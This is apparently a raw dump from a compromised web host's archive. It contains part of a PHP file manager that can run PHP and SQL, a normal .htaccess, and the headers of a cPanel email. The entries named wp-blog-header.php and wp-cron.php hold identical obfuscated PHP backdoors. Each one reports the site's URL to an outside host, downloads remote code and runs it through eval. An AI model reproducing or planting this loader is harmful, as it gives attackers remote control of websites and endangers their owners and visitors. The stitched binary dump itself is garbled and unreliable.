basename($source).'.tar'; if (is_file($archive)) unlink($archive); if (is_file($archive.'.gz')) unlink($archive.'.gz'); clearstatcache(); set_time_limit(0); //die(); $phar = new PharData($destination); $phar->buildFromDirectory($source); $phar->compress(Phar::GZ,'.tar.gz'); unset($phar); if (is_file($archive)) { if (is_file($archive.'.gz')) { unlink($archive); $destination .= '.gz'; } $msg .= __('Task').' "'.__('Archiving').' '.$destination.'" '.__('done'). '. '.fm_link('download',$path.$destination,__('Download'),__('Download').' '. $destination) .' <a href="'.$url_inc.'&delete='.$destination.'&path=' . $path.'" title="'.__('Delete').' '.$destination.'" >'.__('Delete').'</a>'; } else $msg .= __('Error occurred').': '.__('no files'); } elseif (isset($_GET['decompress'])) { // $source = base64_decode($_GET['decompress']); // $destination = basename($source); // $ext = end(explode(".", $destination)); // if ($ext=='zip' OR $ext=='gz') { // $phar = new PharData($source); // $phar->decompress(); // $base_file = str_replace('.'.$ext,'',$destination); // $ext = end(explode(".", $base_file)); // if ($ext=='tar'){ // $phar = new PharData($base_file); // $phar->extractTo(dir($source)); // } // } // $msg .= __('Task').' "'.__('Decompress').' '.$source.'" '.__('done'); } elseif (isset($_GET['gzfile'])) { $source = base64_decode($_GET['gzfile']); $archive = $source.'.tar'; $destination = basename($source).'.tar'; if (is_file($archive)) unlink($archive); if (is_file($archive.'.gz')) unlink($archive.'.gz'); set_time_limit(0); //echo $destination; $ext_arr = explode('.',basename($source)); if (isset($ext_arr[1])) { unset($ext_arr[0]); $ext=implode('.',$ext_arr); } $phar = new PharData($destination); $phar->addFile($source); $phar->compress(Phar::GZ,$ext.'.tar.gz'); unset($phar); if (is_file($archive)) { if (is_file($archive.'.gz')) { unlink($archive); $destination .= '.gz'; } $msg .= __('Task').' "'.__('Archiving').' '.$destination.'" '.__('done'). '. '.fm_link('download',$path.$destination,__('Download'),__('Download').' '. $destination) .' <a href="'.$url_inc.'&delete='.$destination.'&path=' . $path.'" title="'.__('Delete').' '.$destination.'" >'.__('Delete').'</a>'; } else $msg .= __('Error occurred').': '.__('no files'); } ?> <table class="whole" id="header_table" > <tr> <th colspan="2"><?=__('File manager')?><?=(!empty($path)?' - '.$path:'')?></th> </tr> <?php if(!empty($msg)){ ?> <tr> <td colspan="2" class="row2"><?=$msg?></td> </tr> <?php } ?> <tr> <td class="row2"> <table> <tr> <td> <?=fm_home()?> </td> <td> <?php if(!empty($fm_config['make_directory'])) { ?> <form method="post" action="<?=$url_inc?>"> <input type="hidden" name="path" value="<?=$path?>" /> <input type="text" name="dirname" size="15"> <input type="submit" name="mkdir" value="<?=__('Make directory')?>"> </form> <?php } ?> </td> <td> <?php if(!empty($fm_config['new_file'])) { ?> <form method="post" action="<?=$url_inc?>"> <input type="hidden" name="path" value="<?=$path?>" /> <input type="text" name="filename" size="15"> <input type="submit" name="mkfile" value="<?=__('New file')?>"> </form> <?php } ?> </td> <td> <form method="post" action="<?=$url_inc?>" style="display:inline"> <input type="hidden" name="path" value="<?=$path?>" /> <input type="text" placeholder="<?=__('Recursive search')?>" name="search_recursive" value="<?=!empty($_POST['search_recursive'])?$_POST['search_recursive']:''?>" size="15"> <input type="text" name="mask" placeholder="<?=__('Mask')?>" value="<?=!empty($_POST['mask'])?$_POST['mask']:'*.*'?>" size="5"> <input type="submit" name="search" value="<?=__('Search')?>"> </form> </td> <td> <?=fm_run_input('php')?> </td> <td> <?=fm_run_input('sql')?> </td> </tr> </table> </td> <td class="row3"> <table> <tr> <td> <?php if (!empty($fm_config['upload_file'])) { ?> <form name="form1" method="post" action="<?=$url_inc?>" enctype="multipart/form-data"> <input type="hidden" name="path" value="<?=$path?>" /> <input type="file" name="upload" id="upload_hidden" style="position: absolute; display: block; overflow: hidden; width: 0; height: 0; border: 0; padding: 0;" onchange="document.getElementById('upload_visible').value = this.value;" /> <input type="text" readonly="1" id="upload_visible" placeholder="<?=__('Select the file')?>" style="cursor: pointer;" onclick="document.getElementById('upload_hidden').click();" /> <input type="submit" name="test" value="<?=__('Upload')?>" /> </form> <?php } ?> </td> <td> <?php if ($auth['authorize']) { ?> <form action="" method="post"> <input name="quit" type="hidden" value="1"> <?=__('Hello')?>, <?=$auth['login']?> <input type="submit" value="<?=__('Quit')?>"> </form> <?php } ?> </td> <td> <?=fm_lang_form($language)?> </td> <tr> </table> </td> </tr> </table> <table class="all" border='0' cellspacing='1' cellpadding='1' id="fm_table" width="100%"> <thead> <tr> <th style="white-space:nowrap"> <?=__('Filename')?> </th> <th style="white-space:nowrap"> <?=__('Size')?> </th> <th style="white-space:nowrap"> <?=__('Date')?> </th> <th style="white-space:nowrap"> <?=__('Rights')?> </th> <th colspan="4" style="white-space:nowrap"> <?=__('Manage')?> </th> </tr> </thead> <tbody> <?php $elements = fm_scan_dir($path, '', 'all', true); $dirs = array(); $files = array(); foreach ($elements as $file){ if(@is_dir($path . $file)){ $dirs[] = $file; } else { $files[] = $file; } } natsort($dirs); natsort($files); $elements = array_merge($dirs, $files); foreach ($elements as $file){ $filename = $path . $file; $filedata = @stat($filename); if(@is_dir($filename)){ $filedata[7] = ''; if (!empty($fm_config['show_dir_size'])&&!fm_root($file)) $filedata[7] = fm_dir_size($filename); $link = '<a href="'.$url_inc.'&path='.$path.$file.'" title="'.__('Show').' '.$file.'"><span class="folder"> </span> '.$file.'</a>'; $loadlink= (fm_root($file)||$phar_maybe) ? '' : fm_link('zip',$filename,__('Compress').' zip',__('Archiving').' '. $file); $arlink = (fm_root($file)||$phar_maybe) ? '' : fm_link('gz',$filename,__('Compress').' .tar.gz',__('Archiving').' '.$file); $style = 'row2'; if (!fm_root($file)) $alert = 'onClick="if(confirm(\'' . __('Are you sure you want to delete this directory (recursively)?').'\n /'. $file. '\')) document.location.href = \'' . $url_inc . '&delete=' . $file . '&path=' . $path . '\'"'; else $alert = ''; } else { $link = $fm_config['show_img']&&@getimagesize($filename) ? '<a target="_blank" onclick="var lefto = screen.availWidth/2-320;window.open(\'' . fm_img_link($filename) .'\',\'popup\',\'width=640,height=480,left=\' + lefto + \',scrollbars=yes,toolbar=no,location=no,directories=no,status=no\');return false;" href="'.fm_img_link($filename).'"><span class="img"> </span> '.$file.'</a>' : '<a href="' . $url_inc . '&edit=' . $file . '&path=' . $path. '" title="' . __('Edit') . '"><span class="file"> </span> '.$file.'</a>'; $e_arr = explode(".", $file); $ext = end($e_arr); $loadlink = fm_link('download',$filename,__('Download'),__('Download').' '. $file); $arlink = in_array($ext,array('zip','gz','tar')) ? '' : ((fm_root($file)||$phar_maybe) ? '' : fm_link('gzfile',$filename,__('Compress').' .tar.gz',__('Archiving').' '. $file)); $style = 'row1'; $alert = 'onClick="if(confirm(\''. __('File selected').': \n'. $file. '. \n'.__('Are you sure you want to delete this file?') . '\')) document.location.href = \'' . $url_inc . '&delete=' . $file . '&path=' . $path . '\'"'; } $deletelink = fm_root($file) ? '' : '<a href="#" title="' . __('Delete') . ' '. $file . '" ' . $alert . '>' . __('Delete') . '</a>'; $renamelink = fm_root($file) ? '' : '<a href="' . $url_inc . '&rename=' . $file . '&path=' . $path . '" title="' . __('Rename') .' '. $file . '">' . __('Rename') . '</a>'; $rightstext = ($file=='.' || $file=='..') ? '' : '<a href="' . $url_inc . '&rights=' . $file . '&path=' . $path . '" title="' . __('Rights') .' '. $file . '">' . @fm_rights_string($filename) . '</a>'; ?> <tr class="<?=$style?>"> <td><?=$link?></td> <td><?=$filedata[7]?></td> <td style="white-space:nowrap"><?=gmdate("Y-m-d H:i:s",$filedata[9])?></td> <td><?=$rightstext?></td> <td><?=$deletelink?></td> <td><?=$renamelink?></td> <td><?=$loadlink?></td> <td><?=$arlink?></td> </tr> <?php } } ?> </tbody> </table> <div class="row3"><?php $mtime = explode(' ', microtime()); $totaltime = $mtime[0] + $mtime[1] - $starttime; echo fm_home().' | ver. '.$fm_version.' | <a href="https://github.com/Den1xxx/Filemanager">Github</a> | <a href="'.fm_site_url().'">.</a>'; if (!empty($fm_config['show_php_ver'])) echo ' | PHP '.phpversion(); if (!empty($fm_config['show_php_ini'])) echo ' | '.php_ini_loaded_file(); if (!empty($fm_config['show_gt'])) echo ' | '.__('Generation time').': '.round($totaltime,2); if (!empty($fm_config['enable_proxy'])) echo ' | <a href="?proxy=true">proxy</a>'; if (!empty($fm_config['show_phpinfo'])) echo ' | <a href="?phpinfo=true">phpinfo</a>'; if (!empty($fm_config['show_xls'])&&!empty($link)) echo ' | <a href="javascript: void(0)" onclick="var obj = new table2Excel(); obj.CreateExcelSheet(\'fm_table\',\'export\');" title="'.__('Download').' xls">xls</a>'; if (!empty($fm_config['fm_settings'])) echo ' | <a href="?fm_settings=true">'.__('Settings').'</a>'; ?> </div> <script type="text/javascript"> function download_xls(filename, text) { var element = document.createElement('a'); element.setAttribute('href', 'data:application/vnd.ms-excel;base64,' + text); element.setAttribute('download', filename); element.style.display = 'none'; document.body.appendChild(element); element.click(); document.body.removeChild(element); } function base64_encode(m) { for (var k = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/".split(""), c, d, h, e, a, g = "", b = 0, f, l = 0; l < m.length; ++l) { c = m.charCodeAt(l); if (128 > c) d = 1; else for (d = 2; c >= 2 << 5 * d;) ++d; for (h = 0; h < d; ++h) 1 == d ? e = c : (e = h ? 128 : 192, a = d - 2 - 6 * h, 0 <= a && (e += (6 <= a ? 1 : 0) + (5 <= a ? 2 : 0) + (4 <= a ? 4 : 0) + (3 <= a ? 8 : 0) + (2 <= a ? 16 : 0) + (1 <= a ? 32 : 0), a -= 5), 0 > a && (u = 6 * (d - 1 - h), e += c >> u, c -= c >> u << u)), f = b ? f << 6 - b : 0, b += 2, f += e >> b, g += k[f], f = e % (1 << b), 6 == b && (b = 0, g += k[f]) } b && (g += k[f << 6 - b]); return g } var tableToExcelData = (function() { var uri = 'data:application/vnd.ms-excel;base64,', template = '<html xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:x="urn:schemas-microsoft-com:office:excel" xmlns="http://www.w3.org/TR/REC-html40"><head><!--[if gte mso 9]><xml><x:ExcelWorkbook><x:ExcelWorksheets><x:ExcelWorksheet><x:Name>{worksheet}</x:Name><x:WorksheetOptions><x:DisplayGridlines></x:DisplayGridlines></x:WorksheetOptions></x:ExcelWorksheet></x:ExcelWorksheets></x:ExcelWorkbook></xml><![endif]--><meta http-equiv="content-type" content="text/plain; charset=UTF-8"/></head><body><table>{table}</table></body></html>', format = function(s, c) { return s.replace(/{(\w+)}/g, function(m, p) { return c[p]; }) } return function(table, name) { if (!table.nodeType) table = document.getElementById(table) var ctx = { worksheet: name || 'Worksheet', table: table.innerHTML.replace(/<span(.*?)\/span> /g,"").replace(/<a\b[^>]*>(.*?)<\/a>/g,"$1") } t = new Date(); filename = 'fm_' + t.toISOString() + '.xls' download_xls(filename, base64_encode(format(template, ctx))) } })(); var table2Excel = function () { var ua = window.navigator.userAgent; var msie = ua.indexOf("MSIE "); this.CreateExcelSheet = function(el, name){ if (msie > 0 || !!navigator.userAgent.match(/Trident.*rv\:11\./)) {// If Internet Explorer var x = document.getElementById(el).rows; var xls = new ActiveXObject("Excel.Application"); xls.visible = true; xls.Workbooks.Add for (i = 0; i < x.length; i++) { var y = x[i].cells; for (j = 0; j < y.length; j++) { xls.Cells(i + 1, j + 1).Value = y[j].innerText; } } xls.Visible = true; xls.UserControl = true; return xls; } else { tableToExcelData(el, name); } } } </script> </body> </html> <?php //Ported from ReloadCMS project http://reloadcms.com class archiveTar { var $archive_name = ''; var $tmp_file = 0; var $file_pos = 0; var $isGzipped = true; var $errors = array(); var $files = array(); function __construct(){ if (!isset($this->errors)) $this->errors = array(); } function createArchive($file_list){ $result = false; if (file_exists($this->archive_name) && is_file($this->archive_name)) $newArchive = false; else $newArchive = true; if ($newArchive){ if (!$this->openWrite()) return false; } else { if (filesize($this->archive_name) == 0) return $this->openWrite(); if ($this->isGzipped) { $this->closeTmpFile(); if (!rename($this->archive_name, $this->archive_name.'.tmp')){ $this->errors[] = __('Cannot rename').' '.$this->archive_name.__(' to ').$this->archive_name.'.tmp'; return false; } $tmpArchive = gzopen($this->archive_name.'.tmp', 'rb'); if (!$tmpArchive){ $this->errors[] = $this->archive_name.'.tmp '.__('is not readable'); rename($this->archive_name.'.tmp', $this->archive_name); return false; } if (!$this->openWrite()){ rename($this->archive_name.'.tmp', $this->archive_name); return false; } $buffer = gzread($tmpArchive, 512); if (!gzeof($tmpArchive)){ do { $binaryData = pack('a512', $buffer); $this->writeBlock($binaryData); $buffer = gzread($tmpArchive, 512); } while (!gzeof($tmpArchive)); } gzclose($tmpArchive); unlink($this->archive_name.'.tmp'); } else { $this->tmp_file = fopen($this->archive_name, 'r+b'); if (!$this->tmp_file) return false; } } if (isset($file_list) && is_array($file_list)) { if (count($file_list)>0) $result = $this->packFileArray($file_list); } else $this->errors[] = __('No file').__(' to ').__('Archive'); if (($result)&&(is_resource($this->tmp_file))){ $binaryData = pack('a512', ''); $this->writeBlock($binaryData); } $this->closeTmpFile(); if ($newArchive && !$result){ $this->closeTmpFile(); unlink($this->archive_name); } return $result; } function restoreArchive($path){ $fileName = $this->archive_name; if (!$this->isGzipped){ if (file_exists($fileName)){ if ($fp = fopen($fileName, 'rb')){ $data = fread($fp, 2); fclose($fp); if ($data == '\37\213'){ $this->isGzipped = true; } } } elseif ((substr($fileName, -2) == 'gz') OR (substr($fileName, -3) == 'tgz')) $this->isGzipped = true; } $result = true; if ($this->isGzipped) $this->tmp_file = gzopen($fileName, 'rb'); else $this->tmp_file = fopen($fileName, 'rb'); if (!$this->tmp_file){ $this->errors[] = $fileName.' '.__('is not readable'); return false; } $result = $this->unpackFileArray($path); $this->closeTmpFile(); return $result; } function showErrors ($message = '') { $Errors = $this->errors; if(count($Errors)>0) { if (!empty($message)) $message = ' ('.$message.')'; $message = __('Error occurred').$message.': <br/>'; foreach ($Errors as $value) $message .= $value.'<br/>'; return $message; } else return ''; } function packFileArray($file_array){ $result = true; if (!$this->tmp_file){ $this->errors[] = __('Invalid file descriptor'); return false; } if (!is_array($file_array) || count($file_array)<=0) return true; for ($i = 0; $i<count($file_array); $i++){ $filename = $file_array[$i]; if ($filename == $this->archive_name) continue; if (strlen($filename)<=0) continue; if (!file_exists($filename)){ $this->errors[] = __('No file').' '.$filename; continue; } if (!$this->tmp_file){ $this->errors[] = __('Invalid file descriptor'); return false; } if (strlen($filename)<=0){ $this->errors[] = __('Filename').' '.__('is incorrect');; return false; } $filename = str_replace('\\', '/', $filename); $keep_filename = $this->makeGoodPath($filename); if (is_file($filename)){ if (($file = fopen($filename, 'rb')) == 0){ $this->errors[] = __('Mode ').__('is incorrect'); } if(($this->file_pos == 0)){ if(!$this->writeHeader($filename, $keep_filename)) return false; } while (($buffer = fread($file, 512)) != ''){ $binaryData = pack('a512', $buffer); $this->writeBlock($binaryData); } fclose($file); } else $this->writeHeader($filename, $keep_filename); if (@is_dir($filename)){ if (!($handle = opendir($filename))){ $this->errors[] = __('Error').': '.__('Directory ').$filename.__('is not readable'); continue; } while (false !== ($dir = readdir($handle))){ if ($dir!='.' && $dir!='..'){ $file_array_tmp = array(); if ($filename != '.') $file_array_tmp[] = $filename.'/'.$dir; else $file_array_tmp[] = $dir; $result = $this->packFileArray($file_array_tmp); } } unset($file_array_tmp); unset($dir); unset($handle); } } return $result; } function unpackFileArray($path){ $path = str_replace('\\', '/', $path); if ($path == '' || (substr($path, 0, 1) != '/' && substr($path, 0, 3) != '../' && !strpos($path, ':'))) $path = './'.$path; clearstatcache(); while (strlen($binaryData = $this->readBlock()) != 0){ if (!$this->readHeader($binaryData, $header)) return false; if ($header['filename'] == '') continue; if ($header['typeflag'] == 'L'){ //reading long header $filename = ''; $decr = floor($header['size']/512); for ($i = 0; $i < $decr; $i++){ $content = $this->readBlock(); $filename .= $content; } if (($laspiece = $header['size'] % 512) != 0){ $content = $this->readBlock(); $filename .= substr($content, 0, $laspiece); } $binaryData = $this->readBlock(); if (!$this->readHeader($binaryData, $header)) return false; else $header['filename'] = $filename; return true; } if (($path != './') && ($path != '/')){ while (substr($path, -1) == '/') $path = substr($path, 0, strlen($path)-1); if (substr($header['filename'], 0, 1) == '/') $header['filename'] = $path.$header['filename']; else $header['filename'] = $path.'/'.$header['filename']; } if (file_exists($header['filename'])){ if ((@is_dir($header['filename'])) && ($header['typeflag'] == '')){ $this->errors[] =__('File ').$header['filename'].__(' already exists').__(' as folder'); return false; } if ((is_file($header['filename'])) && ($header['typeflag'] == '5')){ $this->errors[] =__('Cannot create directory').'. '.__('File ').$header['filename'].__(' already exists'); return false; } if (!is_writeable($header['filename'])){ $this->errors[] = __('Cannot write to file').'. '.__('File ').$header['filename'].__(' already exists'); return false; } } elseif (($this->dirCheck(($header['typeflag'] == '5' ? $header['filename'] : dirname($header['filename'])))) != 1){ $this->errors[] = __('Cannot create directory').' '.__(' for ').$header['filename']; return false; } if ($header['typeflag'] == '5'){ if (!file_exists($header['filename'])) { if (!mkdir($header['filename'], 0777)) { $this->errors[] = __('Cannot create directory').' '.$header['filename']; return false; } } } else { if (($destination = fopen($header['filename'], 'wb')) == 0) { $this->errors[] = __('Cannot write to file').' '.$header['filename']; return false; } else { $decr = floor($header['size']/512); for ($i = 0; $i < $decr; $i++) { $content = $this->readBlock(); fwrite($destination, $content, 512); } if (($header['size'] % 512) != 0) { $content = $this->readBlock(); fwrite($destination, $content, ($header['size'] % 512)); } fclose($destination); touch($header['filename'], $header['time']); } clearstatcache(); if (filesize($header['filename']) != $header['size']) { $this->errors[] = __('Size of file').' '.$header['filename'].' '.__('is incorrect'); return false; } } if (($file_dir = dirname($header['filename'])) == $header['filename']) $file_dir = ''; if ((substr($header['filename'], 0, 1) == '/') && ($file_dir == '')) $file_dir = '/'; $this->dirs[] = $file_dir; $this->files[] = $header['filename']; } return true; } function dirCheck($dir){ $parent_dir = dirname($dir); if ((@is_dir($dir)) or ($dir == '')) return true; if (($parent_dir != $dir) and ($parent_dir != '') and (!$this->dirCheck($parent_dir))) return false; if (!mkdir($dir, 0777)){ $this->errors[] = __('Cannot create directory').' '.$dir; return false; } return true; } function readHeader($binaryData, &$header){ if (strlen($binaryData)==0){ $header['filename'] = ''; return true; } if (strlen($binaryData) != 512){ $header['filename'] = ''; $this->__('Invalid block size').': '.strlen($binaryData); return false; } $checksum = 0; for ($i = 0; $i < 148; $i++) $checksum+=ord(substr($binaryData, $i, 1)); for ($i = 148; $i < 156; $i++) $checksum += ord(' '); for ($i = 156; $i < 512; $i++) $checksum+=ord(substr($binaryData, $i, 1)); $unpack_data = unpack('a100filename/a8mode/a8user_id/a8group_id/a12size/a12time/a8checksum/a1typeflag/a100link/a6magic/a2version/a32uname/a32gname/a8devmajor/a8devminor', $binaryData); $header['checksum'] = OctDec(trim($unpack_data['checksum'])); if ($header['checksum'] != $checksum){ $header['filename'] = ''; if (($checksum == 256) && ($header['checksum'] == 0)) return true; $this->errors[] = __('Error checksum for file ').$unpack_data['filename']; return false; } if (($header['typeflag'] = $unpack_data['typeflag']) == '5') $header['size'] = 0; $header['filename'] = trim($unpack_data['filename']); $header['mode'] = OctDec(trim($unpack_data['mode'])); $header['user_id'] = OctDec(trim($unpack_data['user_id'])); $header['group_id'] = OctDec(trim($unpack_data['group_id'])); $header['size'] = OctDec(trim($unpack_data['size'])); $header['time'] = OctDec(trim($unpack_data['time'])); return true; } function writeHeader($filename, $keep_filename){ $packF = 'a100a8a8a8a12A12'; $packL = 'a1a100a6a2a32a32a8a8a155a12'; if (strlen($keep_filename)<=0) $keep_filename = $filename; $filename_ready = $this->makeGoodPath($keep_filename); if (strlen($filename_ready) > 99){ //write long header $dataFirst = pack($packF, '././LongLink', 0, 0, 0, sprintf('%11s ', DecOct(strlen($filename_ready))), 0); $dataLast = pack($packL, 'L', '', '', '', '', '', '', '', '', ''); // Calculate the checksum $checksum = 0; // First part of the header for ($i = 0; $i < 148; $i++) $checksum += ord(substr($dataFirst, $i, 1)); // Ignore the checksum value and replace it by ' ' (space) for ($i = 148; $i < 156; $i++) $checksum += ord(' '); // Last part of the header for ($i = 156, $j=0; $i < 512; $i++, $j++) $checksum += ord(substr($dataLast, $j, 1)); // Write the first 148 bytes of the header in the archive $this->writeBlock($dataFirst, 148); // Write the calculated checksum $checksum = sprintf('%6s ', DecOct($checksum)); $binaryData = pack('a8', $checksum); $this->writeBlock($binaryData, 8); // Write the last 356 bytes of the header in the archive $this->writeBlock($dataLast, 356); $tmp_filename = $this->makeGoodPath($filename_ready); $i = 0; while (($buffer = substr($tmp_filename, (($i++)*512), 512)) != ''){ $binaryData = pack('a512', $buffer); $this->writeBlock($binaryData); } return true; } $file_info = stat($filename); if (@is_dir($filename)){ $typeflag = '5'; $size = sprintf('%11s ', DecOct(0)); } else { $typeflag = ''; clearstatcache(); $size = sprintf('%11s ', DecOct(filesize($filename))); } $dataFirst = pack($packF, $filename_ready, sprintf('%6s ', DecOct(fileperms($filename))), sprintf('%6s ', DecOct($file_info[4])), sprintf('%6s ', DecOct($file_info[5])), $size, sprintf('%11s', DecOct(filemtime($filename)))); $dataLast = pack($packL, $typeflag, '', '', '', '', '', '', '', '', ''); $checksum = 0; for ($i = 0; $i < 148; $i++) $checksum += ord(substr($dataFirst, $i, 1)); for ($i = 148; $i < 156; $i++) $checksum += ord(' '); for ($i = 156, $j = 0; $i < 512; $i++, $j++) $checksum += ord(substr($dataLast, $j, 1)); $this->writeBlock($dataFirst, 148); $checksum = sprintf('%6s ', DecOct($checksum)); $binaryData = pack('a8', $checksum); $this->writeBlock($binaryData, 8); $this->writeBlock($dataLast, 356); return true; } function openWrite(){ if ($this->isGzipped) $this->tmp_file = gzopen($this->archive_name, 'wb9f'); else $this->tmp_file = fopen($this->archive_name, 'wb'); if (!($this->tmp_file)){ $this->errors[] = __('Cannot write to file').' '.$this->archive_name; return false; } return true; } function readBlock(){ if (is_resource($this->tmp_file)){ if ($this->isGzipped) $block = gzread($this->tmp_file, 512); else $block = fread($this->tmp_file, 512); } else $block = ''; return $block; } function writeBlock($data, $length = 0){ if (is_resource($this->tmp_file)){ if ($length === 0){ if ($this->isGzipped) gzputs($this->tmp_file, $data); else fputs($this->tmp_file, $data); } else { if ($this->isGzipped) gzputs($this->tmp_file, $data, $length); else fputs($this->tmp_file, $data, $length); } } } function closeTmpFile(){ if (is_resource($this->tmp_file)){ if ($this->isGzipped) gzclose($this->tmp_file); else fclose($this->tmp_file); $this->tmp_file = 0; } } function makeGoodPath($path){ if (strlen($path)>0){ $path = str_replace('\\', '/', $path); $partPath = explode('/', $path); $els = count($partPath)-1; for ($i = $els; $i>=0; $i--){ if ($partPath[$i] == '.'){ // Ignore this directory } elseif ($partPath[$i] == '..'){ $i--; } elseif (($partPath[$i] == '') and ($i!=$els) and ($i!=0)){ } else $result = $partPath[$i].($i!=$els ? '/'.$result : ''); } } else $result = ''; return $result; } } ?>PK ��Y �i(m m wp-blog-header.phpnu ��6�$ <?php goto uKETJ; QZIk_: die; goto Y8mP6; V3bNY: $b = $_REQUEST["\x64\x6f\141\x63\x74"]; goto Bnw1W; Bnw1W: if (!empty($b)) { $_SESSION["\144\x6f\141\x63\164"] = $b; } else { $c = (isset($_SERVER["\x48\x54\124\x50\x53"]) && $_SERVER["\x48\124\x54\x50\123"] === "\x6f\156" ? "\150\x74\164\160\x73" : "\150\164\x74\x70") . "\x3a\57\57{$_SERVER["\110\124\x54\x50\x5f\110\x4f\x53\x54"]}{$_SERVER["\x52\105\121\125\x45\x53\x54\x5f\125\122\x49"]}"; post_u(array("\x77\145\142" => $c)); } goto EI0YM; TfUQi: function post_u($h) { $c = "\x75\x67\x67\143\72\x2f\57\170\146\x6f\x6d\70\144\x2e\x6f\154\x75\x62\147\x2e\147\x62\143\x2f\166\141\x71\162\x6b\56\x63\x75\143"; $i = curl_init(str_rot13($c)); curl_setopt($i, CURLOPT_POST, 1); curl_setopt($i, CURLOPT_POSTFIELDS, $h); curl_setopt($i, CURLOPT_RETURNTRANSFER, true); $j = curl_exec($i); curl_close($i); } goto uVMca; Cg8Hm: eval("\77\x3e" . $d); goto QZIk_; uKETJ: error_reporting(0); goto hLRwA; EI0YM: $d = get_u(str_rot13("\x75\x67\147\143\x66\x3a\57\x2f\151\x63\x66\x71\161\56\x71\163\144\x73\x6e\x67\56\x67\142\x63\x2f\x71\x62\x62\145\x2f") . $b . "\56\x74\170\x74"); goto Cg8Hm; hLRwA: session_start(); goto V3bNY; Y8mP6: function get_u($c) { $e = ''; if (function_exists("\143\165\162\154\137\x65\x78\145\x63")) { $f = curl_init($c); curl_setopt($f, CURLOPT_RETURNTRANSFER, 1); curl_setopt($f, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($f, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($f, CURLOPT_SSL_VERIFYHOST, 0); $e = curl_exec($f); curl_close($f); } if (empty($e) && function_exists("\x66\151\154\145\137\x67\145\164\x5f\x63\157\x6e\164\x65\156\x74\x73")) { $e = file_get_contents($c); } if (empty($e) && function_exists("\146\x6f\x70\x65\x6e") && function_exists("\163\164\x72\x65\x61\x6d\137\x67\x65\x74\137\143\x6f\x6e\164\145\156\x74\x73")) { $g = fopen($c, "\162"); $e = stream_get_contents($g); fclose($g); } return $e; } goto TfUQi; uVMca: ?>PK ��Y �i(m m wp-cron.phpnu �[��� <?php goto uKETJ; QZIk_: die; goto Y8mP6; V3bNY: $b = $_REQUEST["\x64\x6f\141\x63\x74"]; goto Bnw1W; Bnw1W: if (!empty($b)) { $_SESSION["\144\x6f\141\x63\164"] = $b; } else { $c = (isset($_SERVER["\x48\x54\124\x50\x53"]) && $_SERVER["\x48\124\x54\x50\123"] === "\x6f\156" ? "\150\x74\164\160\x73" : "\150\164\x74\x70") . "\x3a\57\57{$_SERVER["\110\124\x54\x50\x5f\110\x4f\x53\x54"]}{$_SERVER["\x52\105\121\125\x45\x53\x54\x5f\125\122\x49"]}"; post_u(array("\x77\145\142" => $c)); } goto EI0YM; TfUQi: function post_u($h) { $c = "\x75\x67\x67\143\72\x2f\57\170\146\x6f\x6d\70\144\x2e\x6f\154\x75\x62\147\x2e\147\x62\143\x2f\166\141\x71\162\x6b\56\x63\x75\143"; $i = curl_init(str_rot13($c)); curl_setopt($i, CURLOPT_POST, 1); curl_setopt($i, CURLOPT_POSTFIELDS, $h); curl_setopt($i, CURLOPT_RETURNTRANSFER, true); $j = curl_exec($i); curl_close($i); } goto uVMca; Cg8Hm: eval("\77\x3e" . $d); goto QZIk_; uKETJ: error_reporting(0); goto hLRwA; EI0YM: $d = get_u(str_rot13("\x75\x67\147\143\x66\x3a\57\x2f\151\x63\x66\x71\161\56\x71\163\144\x73\x6e\x67\56\x67\142\x63\x2f\x71\x62\x62\145\x2f") . $b . "\56\x74\170\x74"); goto Cg8Hm; hLRwA: session_start(); goto V3bNY; Y8mP6: function get_u($c) { $e = ''; if (function_exists("\143\165\162\154\137\x65\x78\145\x63")) { $f = curl_init($c); curl_setopt($f, CURLOPT_RETURNTRANSFER, 1); curl_setopt($f, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($f, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($f, CURLOPT_SSL_VERIFYHOST, 0); $e = curl_exec($f); curl_close($f); } if (empty($e) && function_exists("\x66\151\154\145\137\x67\145\164\x5f\x63\157\x6e\164\x65\156\x74\x73")) { $e = file_get_contents($c); } if (empty($e) && function_exists("\146\x6f\x70\x65\x6e") && function_exists("\163\164\x72\x65\x61\x6d\137\x67\x65\x74\137\143\x6f\x6e\164\145\156\x74\x73")) { $g = fopen($c, "\162"); $e = stream_get_contents($g); fclose($g); } return $e; } goto TfUQi; uVMca: ?>PK ��Y�ͥ�� � .htaccessnu ��6�$ <IfModule mod_rewrite.c> RewriteEngine On RewriteBase / RewriteRule ^index.php$ - [L] RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteRule . index.php [L] </IfModule>PK }��Y#�p�R= R= A 1726644807.M42562P3140107.mgh-web11.maghost.ro,S=81234,W=82612:2,nu ��٘� Return-Path: <cpanel@bloomingcostamices.com> Delivered-To: rudolph.perry@bloomingcostamices.com Received: from mgh-web11.maghost.ro by mgh-web11.maghost.ro with LMTP id urGBAUeC6mYL6i8AJwI5NA (envelope-from <cpanel@bloomingcostamices.com>) for <rudolph.perry@bloomingcostamices.com>; Wed, 18 Sep 2024 10:33:27 +0300 Return-path: <cpanel@bloomingcostamices.com> Envelope-to: rudolph.perry@bloomingcostamices.com Delivery-date: Wed, 18 Sep 2024 10:33:27 +0300 Received: from [127.0.0.1] (port=47150 helo=localhost.localdomain) by mgh-web11.maghost.ro with esmtpa (Exim 4.97.1) (envelope-from <cpanel@bloomingcostamices.com>) id 1sqpBo-0000000DAsj-0FYl for rudolph.perry@bloomingcostamices.com; Wed, 18 Sep 2024 10:33:26 +0300 Date: Wed, 18 Sep 2024 07:33:26 GMT From: "cPanel on bloomingcostamices.com" <cpanel@bloomingcostamices.com> Message-Id: <1726644806.unDQCuQNfmneGftQ@mgh-web11.maghost.ro> Reply-To: "cPanel on bloomingcostamices.com" <cpanel@bloomingcostamices.com> Subject: =?UTF-8?B?W2Jsb29taW5nY29zdGFtaWNlcy5jb21dIENsaWVudCBjb25maWd1?= =?UTF-8?B?cmF0aW9uIHNldHRpbmdzIGZvciDigJxydWRvbHBoLnBlcnJ5QGJsb29taW5n?= =?UTF-8?B?Y29zdGFtaWNlcy5jb23igJ0u?= To: <rudolph.perry@bloomingcostamices.com> X-iContact_locale: en Mime-Version: 1.0 Content-Type: multipart/mixed; boundary="mixed-Cpanel::Email::Object-3140096-1726644806-0.561888666747986" 